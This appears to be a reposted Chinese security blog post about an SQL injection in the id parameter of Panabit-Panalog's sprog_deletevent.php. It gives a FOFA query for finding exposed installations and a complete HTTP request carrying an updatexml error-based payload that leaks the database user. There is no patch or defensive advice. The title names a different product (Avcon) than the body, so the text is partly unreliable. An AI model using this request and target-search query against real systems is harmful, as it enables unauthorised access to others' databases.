Avcon综合管理平台 avcon接口存在SQL注入
漏洞概述
Panabit-Panalog sprog_deletevent接口中id参数存在SQL注入漏洞
空间搜索语法
fofa
app="Panabit-Panalog"
利用过程
登录界面
GET
/Maintain/sprog_deletevent.php?openid=1&id=1%20or%20updatexml(1,concat(0x7e,(user())),0)&cloudip=1
HTTP/1.1
Host
:
User-Agent
: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding
: gzip, deflate, br
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection
: close
Sec-Fetch-Dest
: document
Sec-Fetch-Mode
: navigate
Sec-Fetch-Site
: none
Sec-Fetch-User
: ?1
Te
: trailers
Upgrade-Insecure-Requests
: 1
漏洞存在响应包如下。
原文始发于微信公众号(左逆安全攻防):Panabit-Panalog sprog_deletevent SQL注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论